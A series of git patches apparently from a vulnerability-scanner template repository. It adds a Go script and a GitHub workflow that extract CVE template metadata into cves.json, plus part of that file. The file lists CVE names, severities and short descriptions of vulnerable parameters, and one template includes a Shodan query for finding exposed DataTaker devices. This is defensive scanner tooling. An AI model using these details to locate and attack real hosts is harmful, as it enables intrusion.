https://nvd.nist.gov/vuln/detail/CVE-2017-11165 + - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html + - https://www.exploit-db.com/exploits/42313/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2017-11165 + cwe-id: CWE-200 metadata: - verified: true shodan-query: http.title:"datataker" - tags: cve,cve2017,datataker,config,exposure,lfr + verified: "true" + tags: exposure,lfr,edb,cve,cve2017,datataker,config requests: - method: GET From a32b1cf0acc1df692a7d55356b01a3d089867a2c Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:04:11 +0700 Subject: [PATCH 0983/1133] Add script to extract metadata of cve templates to json For nuclei cve linker extension usage : go run yaml2json.go ~/nuclei-templates/cves/ cves.json --- .github/scripts/yaml2json.go | 92 ++++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 .github/scripts/yaml2json.go diff --git a/.github/scripts/yaml2json.go b/.github/scripts/yaml2json.go new file mode 100644 index 0000000000..ae7a4cae73 --- /dev/null +++ b/.github/scripts/yaml2json.go @@ -0,0 +1,92 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "gopkg.in/yaml.v3" +) + +type Classification struct { + CVSSScore string `yaml:"cvss-score,omitempty"` +} + +type Info struct { + Name string `yaml:"name"` + Severity string `yaml:"severity"` + Description string `yaml:"description"` + Classification Classification `yaml:"classification,omitempty"` +} + +type Data struct { + ID string `yaml:"id"` + Info Info `yaml:"info"` + FilePath string `json:"file_path"` +} + +func main() { + if len(os.Args) != 3 { + fmt.Println("Usage: go run main.go ") + os.Exit(1) + } + + directory := os.Args[1] + outputFile := os.Args[2] + + var data []Data + + err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error { + if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") { + yamlFile, err := ioutil.ReadFile(path) + if err != nil { + fmt.Printf("Error reading YAML file %s: %v\n", path, err) + return err + } + + var d Data + err = yaml.Unmarshal(yamlFile, &d) + if err != nil { + fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err) + return err + } + if d.Info.Classification.CVSSScore == "" { + d.Info.Classification.CVSSScore = "N/A" + } + if d.Info.Classification == (Classification{}) { + d.Info.Classification.CVSSScore = "N/A" + } + d.FilePath = path + + data = append(data, d) + } + return nil + }) + + if err != nil { + fmt.Printf("Error reading directory: %v\n", err) + os.Exit(1) + } + + var jsonData []byte + for _, d := range data { + temp, err := json.Marshal(d) + if err != nil { + fmt.Printf("Error marshalling JSON: %v\n", err) + os.Exit(1) + } + jsonData = append(jsonData, temp...) + jsonData = append(jsonData, byte('\n')) + } + err = ioutil.WriteFile(outputFile, jsonData, 0644) + if err != nil { + fmt.Printf("Error writing JSON data to file: %v\n", err) + os.Exit(1) + } + + fmt.Println("JSON data written to", outputFile) + } + From 34d00acf7ff2f0686dc7166624c7f6d1a9ac25c0 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:10:28 +0700 Subject: [PATCH 0984/1133] Added action for generating cves.json using yaml2json.go --- .github/workflows/cve2json.yml | 37 ++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 .github/workflows/cve2json.yml diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml new file mode 100644 index 0000000000..b0c5a641a4 --- /dev/null +++ b/.github/workflows/cve2json.yml @@ -0,0 +1,37 @@ +name: Generate JSON Metadata of CVE Templates + +on: + push: + tags: + - '*' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + - name: Set up Go + uses: actions/setup-go@v3 + with: + go-version: 1.19 + check-latest: true + cache: true + + - name: run yaml2json.go to generate cves.json + run: | + go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json + + - name: Commit files + run: | + git pull + git add cves.json + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit -m "Auto Generated cves.json [$(date)] :robot:" -a + + - name: Push changes + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: master From dff45bec3f684b7130ff1e3ff916c1d33f9cb1f2 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:17:07 +0700 Subject: [PATCH 0985/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index b0c5a641a4..5168aec4ae 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -20,7 +20,7 @@ jobs: - name: run yaml2json.go to generate cves.json run: | - go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json + GO111MODULE=on go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json - name: Commit files run: | From b127f52ac784764c4fb1d8a755ab53bdb84746b4 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:24:30 +0700 Subject: [PATCH 0986/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 5168aec4ae..08dae7be1c 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -20,7 +20,8 @@ jobs: - name: run yaml2json.go to generate cves.json run: | - GO111MODULE=on go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json + GO111MODULE=off go get gopkg.in/yaml.v3 + GO111MODULE=off go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json - name: Commit files run: | From 8acf7cdf5208b026afa647faff86135702265aea Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:30:21 +0700 Subject: [PATCH 0987/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 08dae7be1c..2c24d1b200 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -17,11 +17,12 @@ jobs: go-version: 1.19 check-latest: true cache: true + working-directory: /tmp/ - name: run yaml2json.go to generate cves.json run: | - GO111MODULE=off go get gopkg.in/yaml.v3 - GO111MODULE=off go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json + go get gopkg.in/yaml.v3 + go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json - name: Commit files run: | From 97f3bc74d39a9f0b65750348b65e5fa4a1bee902 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:32:45 +0700 Subject: [PATCH 0988/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 2c24d1b200..3a48e7d175 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -16,9 +16,7 @@ jobs: with: go-version: 1.19 check-latest: true - cache: true - working-directory: /tmp/ - + - name: run yaml2json.go to generate cves.json run: | go get gopkg.in/yaml.v3 From d62f570694ae09161b6e6543b95e8201a4da2725 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:34:35 +0700 Subject: [PATCH 0989/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 3a48e7d175..78a5a633a4 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -19,7 +19,6 @@ jobs: - name: run yaml2json.go to generate cves.json run: | - go get gopkg.in/yaml.v3 go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json - name: Commit files From 49b0e9abd733eef41ad0e95ec7ca5e5501731652 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:37:27 +0700 Subject: [PATCH 0990/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index 78a5a633a4..ddc027d052 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -19,6 +19,7 @@ jobs: - name: run yaml2json.go to generate cves.json run: | + go env -w GO111MODULE=off go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json - name: Commit files From ebec3b70de2858a0bbb4f94d1e79801490c0b786 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:39:39 +0700 Subject: [PATCH 0991/1133] Update cve2json.yml --- .github/workflows/cve2json.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index ddc027d052..2b31c9004d 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -20,6 +20,7 @@ jobs: - name: run yaml2json.go to generate cves.json run: | go env -w GO111MODULE=off + go get gopkg.in/yaml.v3 go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json - name: Commit files From 88fde7db99735d979febdaadac88827c3839ba65 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 18 Jan 2023 10:44:46 +0700 Subject: [PATCH 0992/1133] Metadata for nuclei cve linker chrome extension --- cves.json | 1552 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1552 insertions(+) create mode 100644 cves.json diff --git a/cves.json b/cves.json new file mode 100644 index 0000000000..1709f1f7ad --- /dev/null +++ b/cves.json @@ -0,0 +1,1552 @@ +{"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2000/CVE-2000-0114.yaml"} +{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.4"}},"file_path":"cves/2001/CVE-2001-1473.yaml"} +{"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2002/CVE-2002-1131.yaml"} +{"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2004/CVE-2004-0519.yaml"} +{"ID":"CVE-2005-2428","Info":{"Name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","Severity":"medium","Description":"Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2005/CVE-2005-2428.yaml"} +{"ID":"CVE-2005-3344","Info":{"Name":"Horde Groupware Unauthenticated Admin Access","Severity":"critical","Description":"Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2005/CVE-2005-3344.yaml"} +{"ID":"CVE-2005-4385","Info":{"Name":"Cofax \u003c=2.0RC3 - Cross-Site Scripting","Severity":"medium","Description":"Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2005/CVE-2005-4385.yaml"} +{"ID":"CVE-2006-1681","Info":{"Name":"Cherokee HTTPD \u003c=0.5 - Cross-Site Scripting","Severity":"medium","Description":"Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2006/CVE-2006-1681.yaml"} +{"ID":"CVE-2006-2842","Info":{"Name":"Squirrelmail \u003c=1.4.6 - Local File Inclusion","Severity":"high","Description":"SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2006/CVE-2006-2842.yaml"} +{"ID":"CVE-2007-0885","Info":{"Name":"Jira Rainbow.Zen - Cross-Site Scripting","Severity":"medium","Description":"Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2007/CVE-2007-0885.yaml"} +{"ID":"CVE-2007-4504","Info":{"Name":"Joomla! RSfiles \u003c=1.0.2 - Local File Inclusion","Severity":"high","Description":"Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2007/CVE-2007-4504.yaml"} +{"ID":"CVE-2007-4556","Info":{"Name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","Severity":"critical","Description":"Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for\"m input beginning with a \"%{\" sequence and ending with a \"}\" character.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2007/CVE-2007-4556.yaml"} +{"ID":"CVE-2007-5728","Info":{"Name":"phpPgAdmin \u003c=4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2007/CVE-2007-5728.yaml"} +{"ID":"CVE-2008-1059","Info":{"Name":"WordPress Sniplets 1.1.2 - Local File Inclusion","Severity":"high","Description":"PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2008/CVE-2008-1059.yaml"} +{"ID":"CVE-2008-1061","Info":{"Name":"WordPress Sniplets \u003c=1.2.2 - Cross-Site Scripting","Severity":"high","Description":"WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2008/CVE-2008-1061.yaml"} +{"ID":"CVE-2008-2398","Info":{"Name":"AppServ Open Project \u003c=2.5.10 - Cross-Site Scripting","Severity":"medium","Description":"AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2008/CVE-2008-2398.yaml"} +{"ID":"CVE-2008-2650","Info":{"Name":"CMSimple 3.1 - Local File Inclusion","Severity":"high","Description":"CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2008/CVE-2008-2650.yaml"} +{"ID":"CVE-2008-4668","Info":{"Name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","Severity":"high","Description":"Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2008/CVE-2008-4668.yaml"} +{"ID":"CVE-2008-4764","Info":{"Name":"Joomla! \u003c=2.0.0 RC2 - Local File Inclusion","Severity":"high","Description":"Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2008/CVE-2008-4764.yaml"} +{"ID":"CVE-2008-5587","Info":{"Name":"phpPgAdmin \u003c=4.2.1 - Local File Inclusion","Severity":"medium","Description":"phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2008/CVE-2008-5587.yaml"} +{"ID":"CVE-2008-6080","Info":{"Name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","Severity":"high","Description":"Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2008/CVE-2008-6080.yaml"} +{"ID":"CVE-2008-6172","Info":{"Name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2008/CVE-2008-6172.yaml"} +{"ID":"CVE-2008-6222","Info":{"Name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","Severity":"high","Description":"Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2008/CVE-2008-6222.yaml"} +{"ID":"CVE-2008-6465","Info":{"Name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2008/CVE-2008-6465.yaml"} +{"ID":"CVE-2008-6668","Info":{"Name":"nweb2fax \u003c=0.2.7 - Local File Inclusion","Severity":"high","Description":"nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2008/CVE-2008-6668.yaml"} +{"ID":"CVE-2008-6982","Info":{"Name":"Devalcms 1.4a - Cross-Site Scripting","Severity":"high","Description":"Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2008/CVE-2008-6982.yaml"} +{"ID":"CVE-2009-0545","Info":{"Name":"ZeroShell \u003c= 1.0beta11 Remote Code Execution","Severity":"critical","Description":"ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-0545.yaml"} +{"ID":"CVE-2009-0932","Info":{"Name":"Horde/Horde Groupware - Local File Inclusion","Severity":"high","Description":"Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2009/CVE-2009-0932.yaml"} +{"ID":"CVE-2009-1151","Info":{"Name":"PhpMyAdmin Scripts - Remote Code Execution","Severity":"critical","Description":"PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2009/CVE-2009-1151.yaml"} +{"ID":"CVE-2009-1496","Info":{"Name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","Severity":"high","Description":"Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2009/CVE-2009-1496.yaml"} +{"ID":"CVE-2009-1558","Info":{"Name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","Severity":"high","Description":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2009/CVE-2009-1558.yaml"} +{"ID":"CVE-2009-1872","Info":{"Name":"Adobe Coldfusion \u003c=8.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-1872.yaml"} +{"ID":"CVE-2009-2015","Info":{"Name":"Joomla! MooFAQ 1.0 - Local File Inclusion","Severity":"high","Description":"Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2009/CVE-2009-2015.yaml"} +{"ID":"CVE-2009-2100","Info":{"Name":"Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion","Severity":"high","Description":"Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2009/CVE-2009-2100.yaml"} +{"ID":"CVE-2009-3053","Info":{"Name":"Joomla! Agora 3.0.0b - Local File Inclusion","Severity":"high","Description":"Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"cves/2009/CVE-2009-3053.yaml"} +{"ID":"CVE-2009-3318","Info":{"Name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","Severity":"high","Description":"Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-3318.yaml"} +{"ID":"CVE-2009-4202","Info":{"Name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","Severity":"high","Description":"Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-4202.yaml"} +{"ID":"CVE-2009-4223","Info":{"Name":"KR-Web \u003c=1.1b2 - Remote File Inclusion","Severity":"high","Description":"KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-4223.yaml"} +{"ID":"CVE-2009-4679","Info":{"Name":"Joomla! Portfolio Nexus - Remote File Inclusion","Severity":"high","Description":"Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-4679.yaml"} +{"ID":"CVE-2009-5020","Info":{"Name":"AWStats \u003c 6.95 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability in awredir.pl in AWStats \u003c 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2009/CVE-2009-5020.yaml"} +{"ID":"CVE-2009-5114","Info":{"Name":"WebGlimpse 2.18.7 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2009/CVE-2009-5114.yaml"} +{"ID":"CVE-2010-0157","Info":{"Name":"Joomla! Component com_biblestudy - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0157.yaml"} +{"ID":"CVE-2010-0219","Info":{"Name":"Apache Axis2 Default Login","Severity":"high","Description":"Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0219.yaml"} +{"ID":"CVE-2010-0467","Info":{"Name":"Joomla! Component CCNewsLetter - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.","Classification":{"CVSSScore":"5.8"}},"file_path":"cves/2010/CVE-2010-0467.yaml"} +{"ID":"CVE-2010-0696","Info":{"Name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0696.yaml"} +{"ID":"CVE-2010-0759","Info":{"Name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0759.yaml"} +{"ID":"CVE-2010-0942","Info":{"Name":"Joomla! Component com_jvideodirect - Directory Traversal","Severity":"high","Description":"Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2010/CVE-2010-0942.yaml"} +{"ID":"CVE-2010-0943","Info":{"Name":"Joomla! Component com_jashowcase - Directory 